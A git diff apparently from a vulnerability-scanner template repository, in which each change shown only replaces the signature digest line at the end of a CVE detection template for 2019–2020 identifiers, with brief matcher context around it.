a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201f9c792bd42a0769739f929b4c38b124dac897f0127f5e20f70bfcc09b90c10902201ff8d2f3589ed948bac03c7f68742755a21c26a6d6afe08678407f958a4795ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f2109ba0c2ffb24f189cfed491529da995393ba4558d306ffa5f2f71283891a022100d4766958907c84cd56b11ef49f58c44f0eff392dcc9ed9ca62ff9f6348e1d776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index 028a16d634..b705463d94 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c9b34ab01cb5b93c5c9eb4d53ed7ccd3e2788b823b5045b92997308e8c3b2de02210094fa054002b0b9d13c5c39142ba8a7d067ae042a99f945ce5a763243c0b3228a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b4020843a1723e1877c66c9c167bf576895be4d75735e939166d2a0b86e21d4022062047ac09a79ddd7eb24bbf0a27e3cb06aab07c6fca1c1c7187a3cab91bace40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index e7f6e08a9f..3d394e5c25 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bb316359192a2e97f1b9e2591e40f644b903975677635775eb5f214b2f6985c0022100d7c4e2e1d2890111c501e357d51ecacce20d48c292c20ba130f8c2b25b7d5d38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e031e7ea49fd89dc438d2ca32663643fdd1db714cbd2479dc7fd54624e7d36140220353a7163baca0d2ffed244a93d15fdd2ae7319ec565a0d0f24176c85f61c5580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index a1978abcfa..0acc08a350 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d2ca585bfa1e478670a139dba643afbc320c5036cd04ad9a0b7bb8ed9eee267f02210089d1ea3ca08cf877349adc37c199ddd68e4b7191d459e3411637dc7dfab55fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba80d72aceccb03e333f0ed9fb4a02d39d56c68f6444986d9d27ebbaf8e4965c02206292d01987026d4e589546c0b715877dc1700eec847b2338c5025229834a1469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index 7c4bc35199..209a9925ea 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b77a0864213b4fe4125f15f85ed5ed145ca4582c1d9f4dca5187290ea38c1bd3022100a85946a5da75421334d5fcaa5c821f33cdec52d34ea8b20f2d1bb7e8e0e70696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201601e4fad8e2b48d46f967966a9ab8fa5e458af4c571199d9075862f80a7301a02206c03298347b6c926221c3b151a97daf1c0cb0fa1476a52b42a7ceb9093b8c411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index 77d5d5b8ca..fc90f72d9e 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022056f1e31a5e091e34f6cd5fed41608e0b77b7fa9e64fd560c2b0a8fad231d3f57022100dcc7c5731a1d90478601c9e4e2c93a873d04f640d036189f295aa48028dbc5df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022012367e14d5dcca835fac4958e7c4357e225698064d660be1768b9ff8dcc90f46022061bc2d92f1e092ba7c3e9a999bfa20f0620806b934b86370ad404b6fa5f37fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index 4ab0d87e0c..0ba35427df 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bc111192ff13adf674babda4414e0d0799303f4ab2707307aea0f41ad0622ba80220638387ac9a037be3d80d1f4940b90239e5d302afc0510b26d7225784a1d2e867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d9e0e230082fe2300413366986b191ccbeccc808f77d1c24f05dc55556a2f7d022100d86640acd6f997183b490fc9a913b33fe9fe65725e2364dc313990e6cb30b00c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index 792103fc01..0b06e29b23 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204f4724147e6b4fccd24a3a74c7d5d9ceb47aeacef3d0b7a842540575f9b1963e022100b096a744afe1978dd47f2cfbca79878b90892ee0ff6dacb1fefd99c6b253ddfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c70dafcc7d7d6eb9f99c114648e5761414018b4367b7b4c159da330e35926b27022100ef3ede4e5be782d7c4408ed990ff80d46955910d129b0198e629c7a39b933e53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index ccd06cac6c..c4766bdb60 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -77,4 +77,4 @@ http: - 'name="login\[_csrf_token\]" value="(.*?)"' internal: true part: body -# digest: 4a0a00473045022100e3a81b15258e85c407afba37c5e98425aecd7660c75135635414559f31097d82022046fc8312c4110e31e2cef362127368744f05d69b7564cffb7f03ef8b604a49cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc087db4244c0b047911c00cc9fb5db15ae8cb82bf20bcb1a1cdf041f95e033802202a2995b1aa3230d1e5e50e1e13d8d2ebdeaa6bf6b3c594e11f226fe00af16103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index 2d08ccdea3..9bcc15b9df 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e2f32b43a1274af7f685f10486e3a05cabdc34c51a8f155bb01bd5dc1b2c085502201fb5b32334bdee1f088a1a80e3c119b4d8c02ea82efeca8bbe968cf9d59b4502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030ab1e62a4f1c8caa5e692844444ead196307e42fd3e2e9f0e1eb502875461520220182f107db03695856a6388ac5f209d313dc8deea153c847aa68fd1e921b37bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 879faef983..1d800d541b 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204193059c6d37e2bcfcee79be9ac734f32f43ad99d44a03f3b04086fe98ecc423022055242cae42df9b1b7cddd32cf8e362c3b7cd83e6c86b6caafa6bdd2419afe187:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf8c8942f083be4875c7bbade9267ac54350324c7bfd1748aed4ad932b2bc2cd022100e3f56f7eb8cbb5403eec108fafa3bbf6565d45761fa7aa7142b70e2145a10f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index b1ab518e46..29957e0fce 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210082927165c3433538e7e7e12142538fcb7d141e7efe13d28f113dbe13d38adfe30220089fa38f74ef4ca0327baf9cb0487dc9990adacbddb2fa5445c29d95067318bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210090b0c9255ed4bd8debc3b78c1174da3d676440ab3b22bbcdb4194d73a494e5af022100e25fd700f360d373bc52a570d4443d67fab5096cdf8954cd830bdc143637a36a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index e06564bff8..3318dce24d 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078f305b9f8b44979daece17792ccaedab9d82d42e567e512843777f97de6999802202ed2117d2b35db6fb159719087c57e497e98fd2872b28111dfeab0b0590463e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202bd3e935c79e99a34c030db69d63651b0c0e7618f9a9fc1fc6f70d6869e1da0c022100c4c8563486961e29e44646e2b2ac28a7baeb2cc11cdaef1dc72c24e72a376cac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 0f039a65c1..04272f6144 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f9ac3029d4404d97aff432c3e0ffa1a4d249936ecc188363eab03cade5a8e338022100b5c1985353a7554572bf061349a934ae25cf128c70bdee4d4ad38891b6ce6e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c8419bc77859a442fcd8d0612de209ebc80b5675ad34980b28a4d5d8e815926e022100e8ae9bdb070d9549bc1f8a3cf90261d0d0346c3621f06f65b273d9ad0c059f16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index 223c527492..7c693fe1bb 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -43,4 +43,4 @@ http: status: - 200 - 500 -# digest: 4a0a00473045022100df2dab5a0a5ad4c2858e8e14de63d1862124c2fb8a172f0fafb12f765bb45dfd0220479f4fde67fb6dce5da95e2aa2f41a52424b683c991434f945d16777c9ce71d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202db1bd7b90c38465caa26ad972238b385632c795a77c3fdf2d4750a4844de611022100a68e428d7f23b1b8d70f125e03f59136ed684653054a1948015423e6c00f6f42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9632.yaml b/http/cves/2019/CVE-2019-9632.yaml index cb87c282dd..5414d13aff 100644 --- a/http/cves/2019/CVE-2019-9632.yaml +++ b/http/cves/2019/CVE-2019-9632.yaml @@ -42,4 +42,4 @@ http: - type: word words: - "CDGPermissions" -# digest: 4a0a00473045022100d8f52efc0132d9da0548edb08cd00e082b89df73730965c6be260eac77067f7602206acdc95cdd0603d42b209c3d751933b859ac36aa5f5c2d4491f4d6ae0da93f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c3a18a3318f70664536a9e7854e0801842104da77cb9d9e51d05151afb9b3a3e02210099ce9dd398cd86776308856981762c06e62b1a25641a9c1916f58095c35cebb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index b25322e974..fe0cd4bef2 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 503 -# digest: 4a0a004730450220280dea602ba019db2902e0a9601b770753eb6c2a0beacc8cb5bb87fd94edad0d02210089e287badd1b31cee7dc07e24453632f61bf2601af2c6393161ae92d19bfe9cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022025be650ff348f8a04fb039a3746a1768515ac939f6037360689dce492053fdc902206d96b09b1aa5587fabab8167454b097b851550076ac5ab327cff954743c0882b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index 9f933eec9b..f2797a2342 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022031bc43dea7cfc90774685068cd90021151fceba9b4b8f74d240f43ffd9da260f022100e9a810e028752235841a1478091eb49535ca89ffbda302ebfc1b39c013e59fca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100db821fa50dfc0ad43f0f6309e81ca1fc7b68bf91be5df336a4bd5cb43f5d016a022100a54f11f1fba2ba7d81d5d470ccbd8b268bf262312d096d9923b4a8f6b0dca73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index f42e4cec13..c5a5c70c45 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210095928fb03724e9caf38f450d65704f308b1b7935e4838abeb83c0d826f3d0eea022100a55608d8db858c3429a25e01ee5f48000a8c17632627da57de81d6fa241ef911:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eebdf2f23a74fda226a58cca586b03c57c6a0dbe50b6b941f2c0ed90d57b944502202f792f81700313b1ca9bb29eb32f003f34a2bbd801a02c7b2d4310aec0b79c8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index 84c0a30781..c773ab19c3 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -44,4 +44,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 -# digest: 4a0a004730450221008788f058ad8bc9a4545396c8291ff2999c00d4060b07149c5cfb9cb2dd2ee71f02205a522fb23c5ab963f1f7138b1716c62a485fb4af6f4868e1792761b108572d83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f236e8f30a6789a8641a2c1d8473b0dd3e9760078d58fe28f1306e332259a30022022c9aa3013a423f01cae3b76a991cf782274821a5681a7e9892d2570574b2b47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index b3d1c3c9c4..f244123dc4 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025eb2b749f69315baa135f24019ef15db3c396a62f1595cbb6af53dc14d7aae8022100cde31cfbe066dad7ce440cdc4f4ee06dc3da7c57a7185cf726aaf72c7d6149a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075f5b1b3927e8f7aedebc28364088cba1ee336b21ad819a295e55d634da59e2802203b60c8b3df80319ca3c99fe15b89adf399eff4b6a2fda7c94890a3ac67b454c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index e9902ace9e..f4f56d6f5a 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207796ce5eaeb19be44756799ab9d240f55cdec21a63358cf9caa45d531049dae8022100f4079b7480e397faab25a83a473d2ce4982b3ca232f2099abc0fd57970acc66e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009de706dab6bf4aa237f7890db3757b317d854708ae192e463dfb326235693e4102207d1dc79160acb0361cfb0219ae8c54227d3de7ffed60c60c9d6153d4556ec127:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index 65fe35feee..b185e39886 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100eaaaae2b3fe1bc4a2f2e207b1186e6d441842506ea615179e40d8b993f96436f022039df49b157d9f30759e5d25af817bb6e6395c56d210814410213e4e6b6697db9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010603459c2e14256ec319379898c9ea32f31d22e6e9fd998f80ab36420c4224402204b58caa678057aed9d04b38352c90d4c2926aa7cb621a82dddffb8462d1fab41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index 8e66ece6f0..25e0f04b91 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204ac6dc934c8fa1e8fc055bace785564fd1059344bfc62e1813a69e4456f1f2d4022100aa3cd7ba3eaa559de71b431812f927108fc69fa375bea0891ff3c729c4b64f48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022012ecfbdba8d16719dc7e960231aa3c297036266d058c7c9fc8f3b007480c9530022100a0b95f27a8e7967b747db19aa3a1294d945aac4a3586cad5b3e2527334e4cbcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index 5d28634640..cf7d547210 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009c6847a5e853e7862ef13765aa884bf90f4694a3c7beac424f9ec2c4e3093c41022100b1df771c7b291d555828fef1286c62785e730cab881f1960149b4a843ac1317b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204bae7c90ae5c55d92a92908965fd3bbb4e40209aeb2b826a633b569c972ddb17022004da97dd48aa1fa01baeeb1aff87b1bc8e3d853fd435679c562f94c3406bfbe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index 058e401921..510d8368e3 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022027874136864d6a9514a295af0cefa39adaed8cc47c13d96bac228922282196fb0221009a1b174f0ffc7aed607f32e952887e3cbab8b5312430d4f9b6eabea6a2652ed1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008dfa7a4d6020faa887de95af9e2bf753c83272bce38621e20458ced0b0999d15022100d88c738364878eeb4389898a6be0e8078f007265c4c649de7029959c804082be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index a1aca44fc0..f3bf88843c 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022055fc4632dd41c5e64c90729f9708620798ef470a177c2de8b90cefce68aa19a30220574843c0664ddd38b5c38bfd98c309a3fbc923d08bb55d7125d92e05042e47aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202810d38eca2db75bc4c43b28dc361d626f957f1c98d6afc36e59d6f4593d770102200527e5476b87920b8a1a0af43f7acd34dcae98d267f8ab22739fb9542b4378fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index e427cc0719..043c8f6209 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ba99d6c3c1b35415a29b07605d8715164e0d24a909bd5d92490d24e135b80b0b022100e138b7e6428ded4eeee310653ff9d3467beda38d2208fa31ebe2d651dee14eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205bbfe9e1fff55c29b383609a112fcd1f14fdabbd51117085aefdc839317b2e80022006b01954505fcc9d2bd2ae3779d6d39d0e692ec9d79a95af1a520c079fb6a794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index f8a14a53ac..5546917b8a 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -42,4 +42,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502207a990c223869ea534afb11dcb5ee30b32a092c96504f702a4c609634602c7107022100aabc1e85ae1b8868b3f3affb647cce1e5b5f85548dbd29e9abb1da949102ba43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc2394653a151aa954095a50e96616ff9125791e698b84b3033759ba8bb524c0022100ecfec8da6e1940a5d5092d9c4f799557736212bef2724b4b2a3e8bf1721d67cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index e5deffd637..848778bd28 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f6af203eafa61520f456e34431ad08278be23262ed4ae0d76c6cfcd5179ae2e202205845c8a2ee3e08dbc47c76decf7fb3355c00c23d0ffb7a81cf87d4cbb19303ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206dcdcf2a0fe7f4a7901d37d6e45349ec08cbe1c5e149a69c0f5460f1de76b1e502203b3778862b0ef524d7aa9e6bb24b9f0f6d15754dbae7b51bd037901f919d750a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index 81f2195e88..0e6c8904c3 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4a0a004730450220342d2c0eeb685d37a874d9b8fda79e0ca51067aa4ebd6b01eda7a70003cde007022100d0adab04aeaf98d9a48fe5e988bdff39b16295587f0e9b479ff0ee0cef63745b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204eafdb38f5d2d7cce18d8d570616b23acc1d01cc27f9126ec822a5e3dc8d7918022100ef91bef6dd3c245f03142b9d7c0994538bfe34344bb2af6b27646b0e00ce1687:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index d321cfa650..57b6027709 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -68,4 +68,4 @@ http: regex: - '"url":"([a-z:/0-9A-Z]+)"' part: body -# digest: 4a0a00473045022021b6939d7c4f18670f5cfbecf32c9400a0ac40797210b7923b1482ee03d5bd7f022100d3e65ba752e30627bb4863fb86f4f76bf9243584e945797fb814a8b3bcf66919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e039e6f57b95460653094da4937229e3699661b22dfdd80f841e0fea091a6005022046863ad39e899fd0fbf1008b4344137c0779cbe9a0695cd2c4ef920d3cb53ef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index 24f8c3c185..eff4accdb2 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207f02ce103c843033fcd0dd39bee5dad70ceb9e191712097646564dc114484d7902202c6318b8db1435ad9b63f45973a1f98d6968ebfdd30a61f06e77574baba5584e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c630d8eb251f12eef66c01e69691d80d23f3c19915634c0ebdfdf18f1b6a954f02207c83f4b945d803a515db82c4de15654a72e39e1485ae17269040ce25b3368abf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 8bde388e41..563a6aea87 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "application/javascript")' - 'contains(body, "$(document).ready(function()")' condition: and -# digest: 4a0a00473045022040f98bb17cb9dd9f543c8f2a14720c7f926c37a4822e9727295abb4bd8b955aa022100c62613f04ac8afcfd750afc1188d0f3f04a2461b90b206d23c4243070659aedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf4f7ac39414a286782cc1465b2e846928bf6384fd900c4b102cef03995c8496022013ce04ef0b306d3248491918201ad410693f3e67d90d2b836a6faf942e301aa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index 9c279b6f1d..8e5b0394cc 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022046bdbb9f7fea509f6974aef34cae17d1fb226ccac0e190ad7b74209206912f90022100b5fcf6b2c1d8e9091c7993b89cfb4807fd752152b50bec57840f5b25e2a1526e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e0a3bd8cc0758c70f852f18748f6fcf9a7cb43d3c339f896caedfb9fd1aba0e9022100db5e8d85a482676d76ccf0ed34b34a258cc4021d7c79b75133f8a250f76542d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 18eecc9895..db184e8204 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e8f3ad83a505b658c3589c8e9f58b16079762f2fa09ff381e60d5674d647682022100a0333025e269f84fba3412ff25616db725b8c77ee8d7bfd724b84838bf009abd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa0cedce737c4a60e3a1f8c125bdf6e0b64e32715758248531af6ade44763703022023e63a805641220d7f1d7508839d384fc5dbb361efc8059271bcffbd8eda6e6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index c8536d75dc..4212dd875a 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 